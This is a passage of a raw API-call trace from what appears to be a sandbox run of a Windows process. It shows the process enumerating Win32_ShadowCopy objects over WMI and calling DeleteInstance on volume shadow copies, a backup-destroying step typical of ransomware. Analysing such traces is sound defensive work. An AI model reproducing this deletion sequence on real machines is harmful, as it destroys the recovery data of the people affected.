WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b786050, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c6b0 | out: pCid=0x1c64c6b0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0111.763] WbemDefPath:IUnknown:Release (This=0x1b786050) returned 0x3 [0111.763] CoGetContextToken (in: pToken=0x1c64c690 | out: pToken=0x1c64c690) returned 0x0 [0111.763] WbemDefPath:IUnknown:AddRef (This=0x1c9012e0) returned 0x4 [0111.763] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9012e0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c7a8 | out: ppvObject=0x1c64c7a8*=0x0) returned 0x80004002 [0111.763] WbemDefPath:IUnknown:Release (This=0x1c9012e0) returned 0x3 [0111.764] WbemDefPath:IUnknown:Release (This=0x1c9012e0) returned 0x2 [0111.764] WbemDefPath:IUnknown:Release (This=0x1c8f1d40) returned 0x0 [0111.764] WbemDefPath:IUnknown:Release (This=0x1c9012e0) returned 0x1 [0111.764] CoGetContextToken (in: pToken=0x1c64d3c0 | out: pToken=0x1c64d3c0) returned 0x0 [0111.764] CoGetContextToken (in: pToken=0x1c64d300 | out: pToken=0x1c64d300) returned 0x0 [0111.764] WbemDefPath:IUnknown:AddRef (This=0x1c9012e0) returned 0x2 [0111.764] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9012e0, riid=0x1c64d440*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d420 | out: ppvObject=0x1c64d420*=0x1c9012e0) returned 0x0 [0111.764] WbemDefPath:IUnknown:Release (This=0x1c9012e0) returned 0x2 [0111.764] WbemDefPath:IUnknown:Release (This=0x1c9012e0) returned 0x1 [0111.765] CoGetContextToken (in: pToken=0x1c64d540 | out: pToken=0x1c64d540) returned 0x0 [0111.765] CoGetContextToken (in: pToken=0x1c64d480 | out: pToken=0x1c64d480) returned 0x0 [0111.765] WbemDefPath:IUnknown:AddRef (This=0x1c9012e0) returned 0x2 [0111.765] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9012e0, riid=0x1c64d5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d5a0 | out: ppvObject=0x1c64d5a0*=0x1c9012e0) returned 0x0 [0111.765] WbemDefPath:IUnknown:Release (This=0x1c9012e0) returned 0x2 [0111.765] WbemDefPath:IUnknown:AddRef (This=0x1c9012e0) returned 0x3 [0111.765] WbemDefPath:IWbemPath:SetText (This=0x1c9012e0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"") returned 0x0 [0111.765] WbemDefPath:IUnknown:Release (This=0x1c9012e0) returned 0x2 [0111.765] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d800 | out: puCount=0x1c64d800*=0x2) returned 0x0 [0111.765] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d800*=0x17, pszText=0x0) returned 0x0 [0111.765] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0111.765] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0111.766] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0111.766] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0111.766] IWbemClassObject:Get (in: This=0x1c900d50, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0111.766] SysStringLen (param_1="root\\cimv2") returned 0xa [0111.766] IWbemClassObject:Get (in: This=0x1c900d50, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0111.766] SysStringLen (param_1="root\\cimv2") returned 0xa [0111.766] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0111.766] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0111.766] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0111.766] IWbemClassObject:Get (in: This=0x1c900d50, wszName="__CLASS", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0111.766] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0111.766] IWbemClassObject:Get (in: This=0x1c900d50, wszName="__CLASS", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0111.766] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0111.767] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c9012e0, puCount=0x1c64cfa0 | out: puCount=0x1c64cfa0*=0x2) returned 0x0 [0111.767] WbemDefPath:IWbemPath:GetText (in: This=0x1c9012e0, lFlags=4, puBuffLength=0x1c64cfa0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfa0*=0x54, pszText=0x0) returned 0x0 [0111.767] WbemDefPath:IWbemPath:GetText (in: This=0x1c9012e0, lFlags=4, puBuffLength=0x1c64cfa0*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfa0*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"") returned 0x0 [0111.767] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cef0 | out: puCount=0x1c64cef0*=0x2) returned 0x0 [0111.767] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cef0*=0x17, pszText=0x0) returned 0x0 [0111.767] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cef0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0111.767] CoGetContextToken (in: pToken=0x1c64cd80 | out: pToken=0x1c64cd80) returned 0x0 [0111.767] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x3 [0111.767] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c950 | out: ppvObject=0x1c64c950*=0x1b797ce0) returned 0x0 [0111.767] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x3 [0111.768] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0111.768] IWbemClassObject:Get (in: This=0x1c900d50, wszName="__GENUS", lFlags=0, pVal=0x1c64cee0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cedc*=0, plFlavor=0x1c64ced8*=0 | out: pVal=0x1c64cee0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64cedc*=3, plFlavor=0x1c64ced8*=64) returned 0x0 [0111.768] WbemDefPath:IWbemPath:GetText (in: This=0x1c9012e0, lFlags=2, puBuffLength=0x1c64cfb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfb0*=0x3d, pszText=0x0) returned 0x0 [0111.768] WbemDefPath:IWbemPath:GetText (in: This=0x1c9012e0, lFlags=2, puBuffLength=0x1c64cfb0*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfb0*=0x3d, pszText="Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"") returned 0x0 [0111.768] IWbemServices:DeleteInstance (in: This=0x1c8f44f8, strObjectPath="Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0113.426] CoTaskMemAlloc (cb=0x8) returned 0x1b77f8d0 [0113.426] IEnumWbemClassObject:Next (in: This=0x1c8f4788, lTimeout=-1, uCount=0x1, apObjects=0x1b77f8d0, puReturned=0x1c64d8b8 | out: apObjects=0x1b77f8d0*=0x1c9014d0, puReturned=0x1c64d8b8*=0x1) returned 0x0 [0113.434] IUnknown:QueryInterface (in: This=0x1c9014d0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cbe0 | out: ppvObject=0x1c64cbe0*=0x1c9014d0) returned 0x0 [0113.435] IUnknown:QueryInterface (in: This=0x1c9014d0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64cc60 | out: ppvObject=0x1c64cc60*=0x0) returned 0x80004002 [0113.435] IUnknown:QueryInterface (in: This=0x1c9014d0, riid=0x7fef2a9d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64c9f8 | out: ppvObject=0x1c64c9f8*=0x0) returned 0x80004002 [0113.436] IUnknown:AddRef (This=0x1c9014d0) returned 0x3 [0113.436] CoGetContextToken (in: pToken=0x1c64c8b0 | out: pToken=0x1c64c8b0) returned 0x0 [0113.437] IUnknown:QueryInterface (in: This=0x1c9014d0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c870 | out: ppvObject=0x1c64c870*=0x1c9014d8) returned 0x0 [0113.437] IMarshal:GetUnmarshalClass (in: This=0x1c9014d8, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c8a0 | out: pCid=0x1c64c8a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0113.437] IUnknown:Release (This=0x1c9014d8) returned 0x3 [0113.437] CoGetContextToken (in: pToken=0x1c64c880 | out: pToken=0x1c64c880) returned 0x0 [0113.437] IUnknown:AddRef (This=0x1c9014d0) returned 0x4 [0113.437] IUnknown:QueryInterface (in: This=0x1c9014d0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c998 | out: ppvObject=0x1c64c998*=0x0) returned 0x80004002 [0113.438] IUnknown:Release (This=0x1c9014d0) returned 0x3 [0113.438] IUnknown:Release (This=0x1c9014d0) returned 0x2 [0113.438] CoGetContextToken (in: pToken=0x1c64cd40 | out: pToken=0x1c64cd40) returned 0x0 [0113.439] CoGetContextToken (in: pToken=0x1c64cc80 | out: pToken=0x1c64cc80) returned 0x0 [0113.439] IUnknown:AddRef (This=0x1c9014d0) returned 0x3 [0113.439] IUnknown:QueryInterface (in: This=0x1c9014d0, riid=0x1c64cdc0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c64cda0 | out: ppvObject=0x1c64cda0*=0x1c9014d0) returned 0x0 [0113.439] IUnknown:Release (This=0x1c9014d0) returned 0x3 [0113.439] IUnknown:Release (This=0x1c9014d0) returned 0x2 [0113.439] IUnknown:Release (This=0x1c9014d0) returned 0x1 [0113.439] CoTaskMemFree (pv=0x1b77f8d0) [0113.440] CoGetContextToken (in: pToken=0x1c64d6c0 | out: pToken=0x1c64d6c0) returned 0x0 [0113.440] IUnknown:AddRef (This=0x1c9014d0) returned 0x2 [0113.440] IWbemClassObject:Get (in: This=0x1c9014d0, wszName="__GENUS", lFlags=0, pVal=0x1c64d830*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d82c*=0, plFlavor=0x1c64d828*=0 | out: pVal=0x1c64d830*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64d82c*=3, plFlavor=0x1c64d828*=64) returned 0x0 [0113.441] IWbemClassObject:Get (in: This=0x1c9014d0, wszName="__PATH", lFlags=0, pVal=0x1c64d7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d7cc*=0, plFlavor=0x1c64d7c8*=0 | out: pVal=0x1c64d7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"", varVal2=0x0), pType=0x1c64d7cc*=8, plFlavor=0x1c64d7c8*=64) returned 0x0 [0113.441] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"") returned 0x53 [0113.441] CoGetObjectContext (in: riid=0x1c64d768*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64d760 | out: ppv=0x1c64d760*=0x212498) returned 0x0 [0113.441] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64d780 | out: pAptType=0x1c64d780*=1) returned 0x0 [0113.441] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64d888 | out: ppvObject=0x1c64d888*=0x0) returned 0x80004002 [0113.442] IUnknown:Release (This=0x212498) returned 0x1 [0113.445] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cdf0 | out: ppv=0x1c64cdf0*=0x1c8f1e20) returned 0x0 [0113.446] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f1e20, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64cb00 | out: ppvObject=0x1c64cb00*=0x0) returned 0x80004002 [0113.446] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c8f1e20, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cae8 | out: ppvObject=0x1c64cae8*=0x1c901a60) returned 0x0 [0113.446] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c901a60, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c9f0 | out: ppvObject=0x1c64c9f0*=0x1c901a60) returned 0x0 [0113.446] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c901a60, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64ca70 | out: ppvObject=0x1c64ca70*=0x0) returned 0x80004002 [0113.446] WbemDefPath:IUnknown:AddRef (This=0x1c901a60) returned 0x3 [0113.446] CoGetContextToken (in: pToken=0x1c64c6c0 | out: pToken=0x1c64c6c0) returned 0x0 [0113.447] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c901a60, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c680 | out: ppvObject=0x1c64c680*=0x1b786150) returned 0x0 [0113.447] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b786150, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c6b0 | out: pCid=0x1c64c6b0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0113.447] WbemDefPath:IUnknown:Release (This=0x1b786150) returned 0x3 [0113.447] CoGetContextToken (in: pToken=0x1c64c690 | out: pToken=0x1c64c690) returned 0x0 [0113.447] WbemDefPath:IUnknown:AddRef (This=0x1c901a60) returned 0x4 [0113.447] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c901a60, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c7a8 | out: ppvObject=0x1c64c7a8*=0x0) returned 0x80004002 [0113.447] WbemDefPath:IUnknown:Release (This=0x1c901a60) returned 0x3 [0113.447] WbemDefPath:IUnknown:Release (This=0x1c901a60) returned 0x2 [0113.447] WbemDefPath:IUnknown:Release (This=0x1c8f1e20) returned 0x0 [0113.448] WbemDefPath:IUnknown:Release (This=0x1c901a60) returned 0x1 [0113.448] CoGetContextToken (in: pToken=0x1c64d3c0 | out: pToken=0x1c64d3c0) returned 0x0 [0113.448] CoGetContextToken (in: pToken=0x1c64d300 | out: pToken=0x1c64d300) returned 0x0 [0113.448] WbemDefPath:IUnknown:AddRef (This=0x1c901a60) returned 0x2 [0113.448] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c901a60, riid=0x1c64d440*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d420 | out: ppvObject=0x1c64d420*=0x1c901a60) returned 0x0 [0113.448] WbemDefPath:IUnknown:Release (This=0x1c901a60) returned 0x2 [0113.448] WbemDefPath:IUnknown:Release (This=0x1c901a60) returned 0x1 [0113.449] CoGetContextToken (in: pToken=0x1c64d540 | out: pToken=0x1c64d540) returned 0x0 [0113.449] CoGetContextToken (in: pToken=0x1c64d480 | out: pToken=0x1c64d480) returned 0x0 [0113.449] WbemDefPath:IUnknown:AddRef (This=0x1c901a60) returned 0x2 [0113.449] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c901a60, riid=0x1c64d5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d5a0 | out: ppvObject=0x1c64d5a0*=0x1c901a60) returned 0x0 [0113.449] WbemDefPath:IUnknown:Release (This=0x1c901a60) returned 0x2 [0113.449] WbemDefPath:IUnknown:AddRef (This=0x1c901a60) returned 0x3 [0113.449] WbemDefPath:IWbemPath:SetText (This=0x1c901a60, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"") returned 0x0 [0113.450] WbemDefPath:IUnknown:Release (This=0x1c901a60) returned 0x2 [0113.450] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d800 | out: puCount=0x1c64d800*=0x2) returned 0x0 [0113.450] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d800*=0x17, pszText=0x0) returned 0x0 [0113.450] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0113.452] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0113.452] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0113.452] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0113.452] IWbemClassObject:Get (in: This=0x1c9014d0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0113.452] SysStringLen (param_1="root\\cimv2") returned 0xa [0113.452] IWbemClassObject:Get (in: This=0x1c9014d0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0113.452] SysStringLen (param_1="root\\cimv2") returned 0xa [0113.452] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0113.452] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0113.452] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0113.452] IWbemClassObject:Get (in: This=0x1c9014d0, wszName="__CLASS", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0113.452] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0113.453] IWbemClassObject:Get (in: This=0x1c9014d0, wszName="__CLASS", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0113.453] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0113.456] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c901a60, puCount=0x1c64cfa0 | out: puCount=0x1c64cfa0*=0x2) returned 0x0 [0113.456] WbemDefPath:IWbemPath:GetText (in: This=0x1c901a60, lFlags=4, puBuffLength=0x1c64cfa0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfa0*=0x54, pszText=0x0) returned 0x0 [0113.456] 